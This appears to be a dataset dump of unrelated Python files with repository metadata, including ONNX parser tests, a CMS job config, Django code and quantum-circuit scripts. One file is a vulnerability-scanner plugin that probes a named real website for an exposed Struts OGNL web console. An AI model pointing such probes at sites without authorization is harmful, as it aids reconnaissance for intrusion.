# Input, character ( len = * ) TITLE, a title to be printed first.
# TITLE may be blank.
#
if ( 0 < len ( title ) ):
print ''
print title
for ihi in range ( n - 1, -1, -70 ):
ilo = max ( ihi - 70, -1 )
print ' ',
for i in range ( ihi, -1, ilo ):
print '%1d' % ( bvec[i] ),
print ''
return
def bvec_print_test ( ):
#*****************************************************************************80
#
## BVEC_PRINT_TEST tests BVEC_PRINT.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 24 December 2014
#
# Author:
#
# John Burkardt
#
import numpy as np
n = 10
bvec = np.array ( [ 1, 0, 0, 1, 0, 1, 1, 1, 0, 0 ] )
print ''
print 'BVEC_PRINT_TEST'
print ' BVEC_PRINT prints a binary vector.'
bvec_print ( n, bvec, ' BVEC:' )
print ''
print 'BVEC_PRINT_TEST'
print ' Normal end of execution.'
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
bvec_print_test ( )
timestamp ( )
|
[
"[email protected]"
] | |
1539d348092bab286434a5b073c5490382d7dffe
|
9f4b1884273f995806c1e755665a92b785cc52a8
|
/onnx/test/parser_test.py
|
46604593e0c848bd177032dfeda4264980d26494
|
[
"Apache-2.0"
] |
permissive
|
zhijl/onnx
|
340f7c5794a9aca96d2a9e76c3336aeebe798776
|
ac0afea916f989c714692dd8551eff762a639cd5
|
refs/heads/main
| 2023-03-31T02:30:50.151799 | 2023-03-20T23:09:55 | 2023-03-20T23:09:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,295 |
py
|
# SPDX-License-Identifier: Apache-2.0
import unittest
from parameterized import parameterized
import onnx
from onnx import GraphProto, OperatorSetIdProto, checker
class TestBasicFunctions(unittest.TestCase):
def check_graph(self, graph: GraphProto) -> None:
self.assertEqual(len(graph.node), 3)
self.assertEqual(graph.node[0].op_type, "MatMul")
self.assertEqual(graph.node[1].op_type, "Add")
self.assertEqual(graph.node[2].op_type, "Softmax")
def test_parse_graph(self) -> None:
input = """
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
graph = onnx.parser.parse_graph(input)
self.check_graph(graph)
def test_parse_model(self) -> None:
input = """
<
ir_version: 7,
opset_import: [ "" : 10, "com.microsoft": 1]
>
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
model = onnx.parser.parse_model(input)
self.assertEqual(model.ir_version, 7)
self.assertEqual(len(model.opset_import), 2)
self.check_graph(model.graph)
def test_parse_graph_error(self) -> None:
input = """
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul[X, W]
S = Add(T, B)
C = Softmax(S)
}
"""
self.assertRaises(
onnx.parser.ParseError, lambda: onnx.parser.parse_graph(input)
)
def test_parse_model_error(self) -> None:
input = """
<
ir_version: 7,
opset_import: [ "" : 10 "com.microsoft": 1]
>
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
self.assertRaises(
onnx.parser.ParseError, lambda: onnx.parser.parse_model(input)
)
def test_parse_function_with_attributes(self) -> None:
input = """
<
ir_version: 9,
opset_import: [ "" : 15, "custom_domain" : 1],
producer_name: "FunctionProtoTest",
producer_version: "1.0",
model_version: 1,
doc_string: "A test model for model local functions."
>
agraph (float[N] x) => (float[N] out)
{
out = custom_domain.Selu<alpha=2.0, gamma=3.0>(x)
}
<
domain: "custom_domain",
opset_import: [ "" : 15],
doc_string: "Test function proto"
>
Selu
<alpha: float=1.67326319217681884765625, gamma: float=1.05070102214813232421875>
(X) => (C)
{
constant_alpha = Constant<value_float: float=@alpha>()
constant_gamma = Constant<value_float: float=@gamma>()
alpha_x = CastLike(constant_alpha, X)
gamma_x = CastLike(constant_gamma, X)
exp_x = Exp(X)
alpha_x_exp_x = Mul(alpha_x, exp_x)
alpha_x_exp_x_ = Sub(alpha_x_exp_x, alpha_x)
neg = Mul(gamma_x, alpha_x_exp_x_)
pos = Mul(gamma_x, X)
_zero = Constant<value_float=0.0>()
zero = CastLike(_zero, X)
less_eq = LessOrEqual(X, zero)
C = Where(less_eq, neg, pos)
}
"""
model = onnx.parser.parse_model(input)
checker.check_model(model)
@parameterized.expand(
[
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu(x) }",
{},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<alpha=2.0>(x) }",
{"alpha": 2.0},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<gamma=3.0>(x) }",
{"gamma": 3.0},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<alpha=2.0, gamma=3.0>(x) }",
{"alpha": 2.0, "gamma": 3.0},
),
]
)
def test_composite_parse_function_with_attributes(
self, graph_text: str, expected_attribute: dict
) -> None:
default_alpha = 1.67326319217681884765625
default_gamma = 1.05070102214813232421875
def expect_custom_node_attribute(node, attributes):
for key in attributes:
match_attr = [attr for attr in node.attribute if attr.name == key]
assert len(match_attr) == 1
assert match_attr[0].f == attributes[key]
def expect_model_function_attribute(model):
assert len(model.functions[0].attribute_proto) == 2
attr_proto_alpha = [
attr_proto
for attr_proto in model.functions[0].attribute_proto
if attr_proto.name == "alpha"
]
assert len(attr_proto_alpha) == 1 and attr_proto_alpha[0].f == default_alpha
attr_proto_gamma = [
attr_proto
for attr_proto in model.functions[0].attribute_proto
if attr_proto.name == "gamma"
]
assert len(attr_proto_gamma) == 1 and attr_proto_gamma[0].f == default_gamma
function_text = f"""
<
domain: "custom_domain",
opset_import: [ "" : 15],
doc_string: "Test function proto"
>
Selu
<alpha: float={default_alpha}, gamma: float={default_gamma}>
(X) => (C)
{{
constant_alpha = Constant<value_float: float=@alpha>()
constant_gamma = Constant<value_float: float=@gamma>()
alpha_x = CastLike(constant_alpha, X)
gamma_x = CastLike(constant_gamma, X)
exp_x = Exp(X)
alpha_x_exp_x = Mul(alpha_x, exp_x)
alpha_x_exp_x_ = Sub(alpha_x_exp_x, alpha_x)
neg = Mul(gamma_x, alpha_x_exp_x_)
pos = Mul(gamma_x, X)
_zero = Constant<value_float=0.0>()
zero = CastLike(_zero, X)
less_eq = LessOrEqual(X, zero)
C = Where(less_eq, neg, pos)
}}
"""
functions = [onnx.parser.parse_function(function_text)]
graph = onnx.parser.parse_graph(graph_text)
opset_imports = [
OperatorSetIdProto(domain="", version=15),
OperatorSetIdProto(domain="custom_domain", version=1),
]
model = onnx.helper.make_model(
graph, functions=functions, opset_imports=opset_imports
)
checker.check_model(model)
expect_model_function_attribute(model)
expect_custom_node_attribute(model.graph.node[0], expected_attribute)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
f4a8e3c81ba011c641b4218d7ed3cca00179f752
|
e0c8662a56d89730043146ddc340e9e0b9f7de72
|
/plugin/14e55cec-1596.py
|
7b13f9266669dc060f05fe19bfca14b9054da31c
|
[] |
no_license
|
izj007/bugscan_poc
|
f2ef5903b30b15c230b292a1ff2dc6cea6836940
|
4490f3c36d4033bdef380577333722deed7bc758
|
refs/heads/master
| 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 720 |
py
|
#coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
"""
POC Name : OGNL console
Author : a
mail : [email protected]
Referer: http://wooyun.org/bugs/wooyun-2010-080076
"""
import urlparse
def assign(service, arg):
if service == 'www':
arr = urlparse.urlparse(arg)
return True, '%s://%s/' % (arr.scheme, arr.netloc)
def audit(arg):
payload = '/struts/webconsole.html'
url = arg + payload
code, head, res, errcode, _ = curl.curl('"%s"' % url)
if code == 200 and "Welcome to the OGNL console" in res:
security_info('find ognl console:' +url)
if __name__ == '__main__':
from dummy import *
audit(assign('www', 'http://www.homilychart.com/')[1])
|
[
"[email protected]"
] | |
8787aeb0950cc8d74bb12753045c0ae4d10b16e6
|
17c280ade4159d4d8d5a48d16ba3989470eb3f46
|
/18/mc/ExoDiBosonResonances/EDBRTreeMaker/test/crab3_analysisWprime1800.py
|
9e802f49450f00b24370cdff361d92b3565fac2c
|
[] |
no_license
|
chengchen1993/run2_ntuple
|
798ff18489ff5185dadf3d1456a4462e1dbff429
|
c16c2b203c05a3eb77c769f63a0bcdf8b583708d
|
refs/heads/master
| 2021-06-25T18:27:08.534795 | 2021-03-15T06:08:01 | 2021-03-15T06:08:01 | 212,079,804 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,082 |
py
|
from WMCore.Configuration import Configuration
config = Configuration()
config.section_("General")
config.General.requestName = 'Wprime_1800_weight_v2'
config.General.transferLogs = True
config.section_("JobType")
config.JobType.pluginName='Analysis'
config.JobType.sendExternalFolder=True# = 'Analysis'
config.JobType.inputFiles = ['Autumn18_V19_MC_L1FastJet_AK4PFchs.txt','Autumn18_V19_MC_L2Relative_AK4PFchs.txt','Autumn18_V19_MC_L3Absolute_AK4PFchs.txt','Autumn18_V19_MC_L1FastJet_AK8PFchs.txt','Autumn18_V19_MC_L2Relative_AK8PFchs.txt','Autumn18_V19_MC_L3Absolute_AK8PFchs.txt','Autumn18_V19_MC_L1FastJet_AK8PFPuppi.txt','Autumn18_V19_MC_L2Relative_AK8PFPuppi.txt','Autumn18_V19_MC_L3Absolute_AK8PFPuppi.txt','Autumn18_V19_MC_L1FastJet_AK4PFPuppi.txt','Autumn18_V19_MC_L2Relative_AK4PFPuppi.txt','Autumn18_V19_MC_L3Absolute_AK4PFPuppi.txt']
#config.JobType.inputFiles = ['PHYS14_25_V2_All_L1FastJet_AK4PFchs.txt','PHYS14_25_V2_All_L2Relative_AK4PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK4PFchs.txt','PHYS14_25_V2_All_L1FastJet_AK8PFchs.txt','PHYS14_25_V2_All_L2Relative_AK8PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK8PFchs.txt']
# Name of the CMSSW configuration file
#config.JobType.psetName = 'bkg_ana.py'
config.JobType.psetName = 'analysis.py'
#config.JobType.allowUndistributedCMSSW = True
config.JobType.allowUndistributedCMSSW = True
config.section_("Data")
#config.Data.inputDataset = '/WJetsToLNu_13TeV-madgraph-pythia8-tauola/Phys14DR-PU20bx25_PHYS14_25_V1-v1/MINIAODSIM'
config.Data.inputDataset = '/WprimeToWZToWlepZhad_narrow_M-1800_13TeV-madgraph/RunIISummer16MiniAODv2-PUMoriond17_80X_mcRun2_asymptotic_2016_TrancheIV_v6-v1/MINIAODSIM'
config.Data.inputDBS = 'global'
#config.Data.inputDBS = 'phys03'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob =10
config.Data.totalUnits = -1
config.Data.publication = False
# This string is used to construct the output dataset name
config.Data.outputDatasetTag = 'Wprime_1800_weight_v2'
config.section_("Site")
# Where the output files will be transmitted to
config.Site.storageSite = 'T2_CH_CERN'
|
[
"[email protected]"
] | |
76c6d426ea19c82ba2d57cfb8810ec4fedfbf1d8
|
f03f7f4cad663f4687b8b87ea9a001cd7a0c6b31
|
/rule_engine/asgi.py
|
626b087bf951a5d79ee0f8275ef1dc902482b7ec
|
[] |
no_license
|
amarbabuk/rule-engine
|
79f05a2338539a8791aaea3a0432e4b8a1a7d1d3
|
9b7a504501d2db02178e4bbeac0409dfd0ba4833
|
refs/heads/master
| 2023-05-03T20:40:01.259232 | 2021-05-15T21:24:18 | 2021-05-15T21:24:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 399 |
py
|
"""
ASGI config for rule_engine project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rule_engine.settings')
application = get_asgi_application()
|
[
"[email protected]"
] | |
669563710a76da0b0965af59920ba5fa960381db
|
a1f009fbc7700cd17fffcd97518bda1593064e33
|
/source_code/python/python_advanced/strings/bytes.py
|
b6ee415eaff9935b7df255dd1b656f9772eacbb5
|
[] |
no_license
|
Alrin12/ComputerScienceSchool
|
2db06f9d198f67ad587535b3cab0dabd8a4b8e5c
|
7543ae686394fc573f80bf680ae4371a2871dede
|
refs/heads/master
| 2021-01-23T15:04:22.672139 | 2017-07-17T15:32:31 | 2017-07-17T15:32:31 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
b = b"abcde"
#print(b)
#print(b.upper())
#print(b.startswith(b"ab"))
#bytes -> string
string = b.decode('UTF-8')
print(string)
|
[
"[email protected]"
] | |
cbabaab8f53d23cfaa2ecbf319388276b6172f67
|
433d8d457ed431b9ad38e3ed8ed6e441b7caa334
|
/bin/generate_zippylog_message_classes
|
92c4f25b4a7ff5fa92a47278254795a8f91aaf8f
|
[
"Apache-2.0"
] |
permissive
|
indygreg/zippylog
|
365f4f95dd2c9f8743180178fa90d66b0611cc71
|
5efc10b28a3e9d5f4df6c2014e7121d689291a70
|
refs/heads/master
| 2020-05-09T17:15:23.063121 | 2012-09-06T23:53:19 | 2012-09-06T23:53:19 | 795,523 | 8 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,674 |
#!/usr/bin/python
# Copyright 2011 Gregory Szorc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# this script is meant to be used by zippylog developers only.
# it generates the autogenerated protocol buffer classes for the messages
# defined by zippylog itself
# it is assumed this script is executed from within a source distribution
from json import dump, load
from os import walk
from os.path import exists, join, dirname, splitext
from shutil import copy2, rmtree
from subprocess import Popen
from sys import path
from tempfile import mkdtemp
base_dir = dirname(dirname(__file__))
path.insert(0, join(base_dir, 'lib', 'py'))
proto_dir = join(base_dir, 'proto')
zippylog_compile = join(base_dir, 'bin', 'zippylog_compile')
state_file = join(proto_dir, 'zippylog-state.json')
out_dir = mkdtemp()
print 'temp output directory: %s' % out_dir
if exists(state_file):
copy2(state_file, join(out_dir, 'zippylog-state.json'))
compile_args = [ zippylog_compile, '--cpp-namespace', 'zippylog' ]
compile_args.append(proto_dir)
compile_args.append(out_dir)
p = Popen(compile_args)
if p.wait() != 0:
print 'zippylog_compile did not execute successfully'
exit(1)
copy2(join(out_dir, 'zippylog-state.json'), state_file)
for root, dirs, files in walk(join(out_dir, 'py', 'zippylog')):
for f in filter(lambda x: x[-3:] == '.py', files):
src = join(root, f)
dst = src[len(out_dir)+1:]
copy2(src, join(base_dir, 'lib', dst))
for root, dirs, files in walk(join(out_dir, 'cpp', 'zippylog')):
for f in filter(lambda x: splitext(x)[1] in ['.h', '.hpp', '.cc', '.cpp'], files):
src = join(root, f)
dst = src[len(out_dir)+5:]
copy2(src, join(base_dir, 'src', dst))
for root, dirs, files in walk(join(out_dir, 'lua', 'zippylog')):
for f in filter(lambda x: splitext(x)[1] in ['.h', '.cc'], files):
src = join(root, f)
dst = src[len(out_dir)+5:]
copy2(src, join(base_dir, 'src', dst))
copy2(join(out_dir, 'lua', 'lua-protobuf.h'), join(base_dir, 'src', 'lua-protobuf.h'))
copy2(join(out_dir, 'lua', 'lua-protobuf.cc'), join(base_dir, 'src', 'lua-protobuf.cc'))
rmtree(out_dir)
|
[
"[email protected]"
] | ||
14fcaeb305d053f5521da45fd3ee2dd1a9697fba
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/data/p3BR/R1/benchmark/startCirq155.py
|
094f1a6799a76414621d8cdf570c3e79f509ea54
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,673 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=29
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.rx(-0.09738937226128368).on(input_qubit[2])) # number=2
c.append(cirq.H.on(input_qubit[1])) # number=3
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=15
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[1])) # number=19
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=20
c.append(cirq.H.on(input_qubit[1])) # number=21
c.append(cirq.H.on(input_qubit[1])) # number=26
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=27
c.append(cirq.H.on(input_qubit[1])) # number=28
c.append(cirq.X.on(input_qubit[1])) # number=23
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=18
c.append(cirq.Z.on(input_qubit[1])) # number=11
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=12
c.append(cirq.Y.on(input_qubit[1])) # number=14
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[1])) # number=6
c.append(cirq.Z.on(input_qubit[1])) # number=8
c.append(cirq.X.on(input_qubit[1])) # number=7
c.append(cirq.rx(-2.42845112122491).on(input_qubit[1])) # number=25
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq155.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
|
[
"[email protected]"
] | |
627cf8253da28f9a0b598a5ce5132606b0f3c62b
|
a1431c25ebd62daead742e0120a16253c4cf67ca
|
/django/movie/migrations/0002_auto_20190910_2053.py
|
212f7307d9b37543ceb71c884a998090b3067fed
|
[] |
no_license
|
KonradMarzec1991/my_MDB
|
f840cbf495c23272b3e39db68c241219a60d63bd
|
d77339a4c37a3d7ae21b6d28bd9644ce15130f10
|
refs/heads/master
| 2022-04-29T10:15:37.109422 | 2019-11-03T20:13:57 | 2019-11-03T20:13:57 | 207,375,063 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,230 |
py
|
# Generated by Django 2.2.5 on 2019-09-10 20:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('movie', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=140)),
('last_name', models.CharField(max_length=140)),
('born', models.DateField()),
('died', models.DateField(blank=True, null=True)),
],
options={
'ordering': ('last_name', 'first_name'),
},
),
migrations.AlterModelOptions(
name='movie',
options={'ordering': ('-year', 'title')},
),
migrations.CreateModel(
name='Role',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=140)),
('movie', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='movie.Movie')),
('person', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='movie.Person')),
],
options={
'unique_together': {('movie', 'person', 'name')},
},
),
migrations.AddField(
model_name='movie',
name='actors',
field=models.ManyToManyField(blank=True, related_name='acting_credits', through='movie.Role', to='movie.Person'),
),
migrations.AddField(
model_name='movie',
name='director',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='directed', to='movie.Person'),
),
migrations.AddField(
model_name='movie',
name='writers',
field=models.ManyToManyField(blank=True, related_name='writing_credits', to='movie.Person'),
),
]
|
[
"[email protected]"
] | |
ca059aa8c32a39ed214dc0199c72e92922850c57
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02677/s955369222.py
|
6cf51b7ad9b75384f56164aff5faa203ac653ac3
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 465 |
py
|
"""AtCoder."""
import math
a, b, h, m = [int(v) for v in input().split(' ')]
class Point:
def __init__(self, r, v):
self.r = r
self.w = (2 * math.pi) / v
def get_pos(self, t):
wt = self.w * t
return self.r * math.cos(wt), self.r * math.sin(wt)
p1 = Point(a, 12 * 60)
p2 = Point(b, 60)
minute = (h * 60) + m
x1, y1 = p1.get_pos(minute)
x2, y2 = p2.get_pos(minute)
print(math.sqrt(pow(x1 - x2, 2) + pow(y1 - y2, 2)))
|
[
"[email protected]"
] | |
2f5a0fdf8f81ef767fc19d5a34d2bbaeb635d01d
|
646f2a135dc8ba97b2fc7436194dcab2a8f0ae8c
|
/autocomplete_light/channel/base.py
|
8ba3f984df5a1c0a22922c1c42937c3567e22822
|
[
"MIT"
] |
permissive
|
pix0r/django-autocomplete-light
|
9f55252d4aa4fb8a28471772a98e793b171cdb0c
|
f1026dfe49934065206ca1fdae46289c68e8c231
|
refs/heads/master
| 2020-12-30T18:50:36.304623 | 2012-05-30T09:39:24 | 2012-05-30T09:39:24 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,932 |
py
|
"""
The channel.base module provides a channel class which you can extend to make
your own channel. It also serves as default channel class.
"""
from django.core import urlresolvers
from django.template import loader
from django.utils.translation import ugettext_lazy as _
__all__ = ('ChannelBase',)
class ChannelBase(object):
"""
A basic implementation of a channel, which should fit most use cases.
Attributes:
model
The model class this channel serves. If None, a new class will be
created in registry.register, and the model attribute will be set in
that subclass. So you probably don't need to worry about it, just know
that it's there for you to use.
result_template
The template to use in result_as_html method, to render a single
autocomplete suggestion. By default, it is
autocomplete_light/channelname/result.html or
autocomplete_light/result.html.
autocomplete_template
The template to use in render_autocomplete method, to render the
autocomplete box. By default, it is
autocomplete_light/channelname/autocomplete.html or
autocomplete_light/autocomplete.html.
search_field
The name of the field that the default implementation of query_filter
uses. Default is 'name'.
limit_results
The number of results that this channel should return. For example, if
query_filter returns 50 results and that limit_results is 20, then the
first 20 of 50 results will be rendered. Default is 20.
bootstrap
The name of the bootstrap kind. By default, deck.js will only
initialize decks for wrappers that have data-bootstrap="normal". If
you want to implement your own bootstrapping logic in javascript,
then you set bootstrap to anything that is not "normal". Default is
'normal'.
placeholder
The initial text in the autocomplete text input.
"""
model = None
search_field = 'name'
limit_results = 20
bootstrap = 'normal'
placeholder = _(u'type some text to search in this autocomplete')
result_template = None
autocomplete_template = None
def __init__(self):
"""
Set result_template and autocomplete_template if necessary.
"""
name = self.__class__.__name__.lower()
if not self.result_template:
self.result_template = [
'autocomplete_light/%s/result.html' % name,
'autocomplete_light/result.html',
]
if not self.autocomplete_template:
self.autocomplete_template = [
'autocomplete_light/%s/autocomplete.html' % name,
'autocomplete_light/autocomplete.html',
]
self.request = None
def get_absolute_url(self):
"""
Return the absolute url for this channel, using
autocomplete_light_channel url
"""
return urlresolvers.reverse('autocomplete_light_channel', args=(
self.__class__.__name__,))
def as_dict(self):
"""
Return a dict of variables for this channel, it is used by javascript.
"""
return {
'url': self.get_absolute_url(),
'name': self.__class__.__name__
}
def init_for_request(self, request, *args, **kwargs):
"""
Set self.request, self.args and self.kwargs, useful in query_filter.
"""
self.request = request
self.args = args
self.kwargs = kwargs
def query_filter(self, results):
"""
Filter results using the request.
By default this will expect results to be a queryset, and will filter
it with self.search_field + '__icontains'=self.request['q'].
"""
q = self.request.GET.get('q', None)
if q:
kwargs = {"%s__icontains" % self.search_field: q}
results = results.filter(**kwargs)
return results
def values_filter(self, results, values):
"""
Filter results based on a list of values.
By default this will expect values to be an iterable of model ids, and
results to be a queryset. Thus, it will return a queryset where pks are
in values.
"""
results = results.filter(pk__in=values)
return results
def get_queryset(self):
"""
Return a queryset for the channel model.
"""
return self.model.objects.all()
def get_results(self, values=None):
"""
Return an iterable of result to display in the autocomplete box.
By default, it will:
- call self.get_queryset(),
- call values_filter() if values is not None,
- call query_filter() if self.request is set,
- call order_results(),
- return a slice from offset 0 to self.limit_results.
"""
results = self.get_queryset()
if values is not None:
# used by the widget to prerender existing values
results = self.values_filter(results, values)
elif self.request:
# used by the autocomplete
results = self.query_filter(results)
return self.order_results(results)[0:self.limit_results]
def order_results(self, results):
"""
Return the result list after ordering.
By default, it expects results to be a queryset and order it by
search_field.
"""
return results.order_by(self.search_field).distinct()
def are_valid(self, values):
"""
Return True if the values are valid.
By default, expect values to be a list of object ids, return True if
all the ids are found in the queryset.
"""
return self.get_queryset().filter(pk__in=values).count() == len(values)
def result_as_html(self, result, extra_context=None):
"""
Return the html representation of a result for display in the deck
and autocomplete box.
By default, render result_template with channel and result in the
context.
"""
context = {
'channel': self,
'result': result,
'value': self.result_as_value(result),
}
context.update(extra_context or {})
return loader.render_to_string(self.result_template, context)
def result_as_value(self, result):
"""
Return the value that should be set to the widget field for a result.
By default, return result.pk.
"""
return result.pk
def render_autocomplete(self):
"""
Render the autocomplete suggestion box.
By default, render self.autocomplete_template with the channel in the
context.
"""
return loader.render_to_string(self.autocomplete_template, {
'channel': self,
})
|
[
"[email protected]"
] | |
a585d4489cb8b4295cdbaa734255fddff64656b5
|
416f598c62277659f787a37d06f3ebc633a79d53
|
/every_election/apps/organisations/migrations/0036_auto_20180606_1035.py
|
bfa7659c15a88e941da82db96db06e8575c0edfb
|
[] |
no_license
|
chris48s/EveryElection
|
53b6d807e97b2a8b9a943dedcc5ff6ecc65d20fc
|
38192a075ae359b91e2aa352fb3886c6c93d3337
|
refs/heads/master
| 2021-01-22T19:49:15.898338 | 2018-08-17T09:11:42 | 2018-08-17T09:11:42 | 85,244,907 | 0 | 0 | null | 2017-03-16T21:53:29 | 2017-03-16T21:53:28 | null |
UTF-8
|
Python
| false | false | 484 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-06 10:35
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('organisations', '0035_rename_divset_constraint'),
]
operations = [
migrations.AlterModelOptions(
name='organisation',
options={'get_latest_by': 'start_date', 'ordering': ('official_name', '-start_date')},
),
]
|
[
"[email protected]"
] | |
0216d00c4a0280404201ed358bfc7c240952ec5a
|
0202d8faff21f24e468654b3da56ca16457ff5b3
|
/entrant/abc133/abc133-c.py
|
a93b0c17761a620084c2519ce520de7d390fcc5d
|
[] |
no_license
|
ryogoOkura/atcoder
|
a3d8d052c6424db26994444eca1ebaa3efbd3e21
|
2865b42bbdb50d83bf129fd868083c2363e92024
|
refs/heads/master
| 2021-06-24T06:07:32.290393 | 2021-01-02T13:39:24 | 2021-01-02T13:39:24 | 187,552,021 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 258 |
py
|
l,r=map(int,input().split())
if (l//2019) == (r//2019):
l,r=l%2019,r%2019
ans=2018
for i in range(l,r):
for j in range(i+1,r+1):
tmp=(i*j)%2019
if tmp<ans:
ans=tmp
print(ans)
else:
print(0)
|
[
"[email protected]"
] | |
39ceb9d36775a75edf35014ee07e0ae39affc16f
|
f8f2536fa873afa43dafe0217faa9134e57c8a1e
|
/aliyun-python-sdk-hbr/aliyunsdkhbr/request/v20170908/DescribeHanaRestoresRequest.py
|
29b991a2c5cbecc928a581fe3e4ae75d2966a997
|
[
"Apache-2.0"
] |
permissive
|
Sunnywillow/aliyun-openapi-python-sdk
|
40b1b17ca39467e9f8405cb2ca08a85b9befd533
|
6855864a1d46f818d73f5870da0efec2b820baf5
|
refs/heads/master
| 2022-12-04T02:22:27.550198 | 2020-08-20T04:11:34 | 2020-08-20T04:11:34 | 288,944,896 | 1 | 0 |
NOASSERTION
| 2020-08-20T08:04:01 | 2020-08-20T08:04:01 | null |
UTF-8
|
Python
| false | false | 2,536 |
py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
